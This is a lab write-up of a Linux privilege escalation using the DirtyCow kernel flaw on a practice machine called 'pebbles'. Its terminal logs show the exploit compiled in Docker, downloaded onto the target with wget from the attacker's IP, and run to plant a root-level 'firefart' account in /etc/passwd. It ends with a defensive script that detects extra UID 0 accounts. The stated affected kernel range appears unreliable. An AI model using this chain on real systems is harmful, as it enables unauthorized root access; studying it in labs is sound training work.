CVE-2016-5195 (DirtyCow)
PEAS has identified that the target system is vulnerable to CVE-2016-5195 (DirtyCow).
A vulnerability was found in the Linux Kernel up to 4.2.3 (operating system) and has been declared critical. It affects unknown code in the Kernel Memory Subsystem component; manipulation with unknown input leads to a race condition vulnerability (Dirty COW). The CWE definition for the vulnerability is CWE-362: the product contains a code sequence that can run concurrently with other code, and that code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently. In terms of impact, it is known to affect confidentiality, integrity, and availability.
Exploit
Exploit located online
www-data@pebbles:/$ gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
www-data@pebbles:/$ cc
The program 'cc' can be found in the following packages:
* gcc
* clang
* tcc
Ask your administrator to install one of them
No compiler is available locally, so the exploit is compiled remotely instead.
Docker Exploit Development
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ docker run -it --entrypoint "/bin/bash" -v ./:/root/host --name pebbles ubuntu:16.04
root@ed4ffa517958:/# cd root; apt update -y; apt install git make nano gcc gcc-multilib -y
root@ed4ffa517958:~# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
Setting up the environment
root@ed4ffa517958:~# nano dirty.c
root@ed4ffa517958:~# gcc -pthread dirty.c -o dirty -lcrypt
root@ed4ffa517958:~# cp dirty host/
Compiling and packaging the exploit
Exploitation
root@pebbles:/var/tmp# wget -q http://192.168.45.192/dirty ; chmod 755 ./dirty
Delivery complete
www-data@pebbles:/var/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: Qwer1234
Complete line:
firefart:fijoB5ycaIoR6:0:0:pwned:/root:/bin/bash
mmap: 7f0adf049000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'Qwer1234'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'Qwer1234'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Exploit successful
www-data@pebbles:/var/tmp$ su firefart
Password: Qwer1234
firefart@pebbles:/var/tmp# whoami
firefart
firefart@pebbles:/var/tmp# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@pebbles:/var/tmp# hostname
pebbles
firefart@pebbles:/var/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:50:88 brd ff:ff:ff:ff:ff:ff
inet 192.168.209.52/24 brd 192.168.209.255 scope global ens160
valid_lft forever preferred_lft forever
System level compromise
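The artifact this exploit leaves behind is a second UID 0 account in /etc/passwd (the firefart line above). As an added example, not part of the original writeup or of the exploit, the following POSIX sh script audits a passwd-format file for exactly that indicator; the sample file it builds is constructed from the writeup's output.

```sh
#!/bin/sh
# Added example (not from the original writeup): detect extra UID 0 accounts,
# the post-exploitation artifact shown above ("firefart:...:0:0:pwned:...").

# Print every username in file $1 whose UID field is 0 and whose name is not
# "root". Field layout is name:password:uid:gid:gecos:home:shell.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Return 0 if root is the only UID 0 account in $1, 1 otherwise, so the
# function can be used directly as a cron or CI check.
check_passwd_file() {
    if [ -n "$(extra_uid0_accounts "$1")" ]; then
        return 1
    fi
    return 0
}

# Constructed sample input modelled on the writeup; the 'pwned' line is the
# injected entry. Replace "$sample" with /etc/passwd on a host you administer.
sample="$(mktemp)"
cat > "$sample" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
firefart:fijoB5ycaIoR6:0:0:pwned:/root:/bin/bash
EOF

if check_passwd_file "$sample"; then
    echo "OK: root is the only UID 0 account in $sample"
else
    echo "ALERT: extra UID 0 account(s): $(extra_uid0_accounts "$sample" | tr '\n' ' ')"
fi
rm -f "$sample"
```

A clean result only means this particular artifact is absent; it says nothing about whether the kernel itself is patched, and a leftover /tmp/passwd.bak (the backup the exploit reminds the operator to restore) is a second indicator worth checking alongside it.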